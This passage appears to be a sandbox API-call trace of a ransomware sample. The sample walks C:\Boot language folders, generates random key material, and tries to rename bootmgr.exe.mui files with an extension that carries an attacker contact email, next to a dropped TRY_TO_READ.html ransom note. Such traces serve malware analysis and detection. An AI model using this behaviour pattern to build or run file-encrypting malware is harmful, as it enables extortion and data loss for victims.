	[0052.018] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.018] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.018] GetProcessHeap () returned 0x540000
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.018] CloseHandle (hObject=0xffffffff) returned 0
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55f8 | out: hHeap=0x540000) returned 1
	[0052.018] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nb-NO\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5754a0
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.018] GetLastError () returned 0x6
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5754e0
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5754e0 | out: hHeap=0x540000) returned 1
	[0052.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.019] FindNextFileW (in: hFindFile=0x5754a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.019] GetLastError () returned 0x6
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5754e0
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5754e0 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.019] FindNextFileW (in: hFindFile=0x5754a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.019] GetLastError () returned 0x6
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a55d0 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.019] FindNextFileW (in: hFindFile=0x5754a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.019] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.019] GetLastError () returned 0x6
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.020] FindNextFileW (in: hFindFile=0x5754a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b72d8
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966b0
	[0052.020] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b72d8 | out: pbBuffer=0x5b72d8) returned 1
	[0052.020] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966b0 | out: pbBuffer=0x5966b0) returned 1
	[0052.020] SetFileAttributesW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.020] lstrlenW (lpString="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30
	[0052.020] GetProcessHeap () returned 0x540000
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.020] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui"
	[0052.020] lstrcatW (in: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.020] MoveFileExW (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.020] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.020] GetProcessHeap () returned 0x540000
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.020] CloseHandle (hObject=0xffffffff) returned 0
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5620 | out: hHeap=0x540000) returned 1
	[0052.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5648 | out: hHeap=0x540000) returned 1
	[0052.021] FindFirstFileW (in: lpFileName="C:\\\\Boot\\nl-NL\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5754e0
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.021] GetLastError () returned 0x6
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575520
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575520 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5620 | out: hHeap=0x540000) returned 1
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.021] FindNextFileW (in: hFindFile=0x5754e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.021] GetLastError () returned 0x6
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575520
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575520 | out: hHeap=0x540000) returned 1
	[0052.021] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.021] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5620 | out: hHeap=0x540000) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.022] FindNextFileW (in: hFindFile=0x5754e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.022] GetLastError () returned 0x6
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5620
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5620 | out: hHeap=0x540000) returned 1
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.022] FindNextFileW (in: hFindFile=0x5754e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.022] GetLastError () returned 0x6
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.022] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.022] FindNextFileW (in: hFindFile=0x5754e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cb05f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b73e0
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5966c0
	[0052.022] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b73e0 | out: pbBuffer=0x5b73e0) returned 1
	[0052.022] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5966c0 | out: pbBuffer=0x5966c0) returned 1
	[0052.022] SetFileAttributesW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.022] lstrlenW (lpString="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30
	[0052.022] GetProcessHeap () returned 0x540000
	[0052.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.023] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui"
	[0052.023] lstrcatW (in: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.023] MoveFileExW (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.023] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.023] GetProcessHeap () returned 0x540000
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.023] CloseHandle (hObject=0xffffffff) returned 0
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5670 | out: hHeap=0x540000) returned 1
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5698 | out: hHeap=0x540000) returned 1
	[0052.023] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pl-PL\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575520
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.023] GetLastError () returned 0x6
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0052.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575560
	[0052.023] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575560 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5670 | out: hHeap=0x540000) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.024] FindNextFileW (in: hFindFile=0x575520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cb05f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cb05f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.024] GetLastError () returned 0x6
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5670
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575560
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575560 | out: hHeap=0x540000) returned 1
	[0052.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.024] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
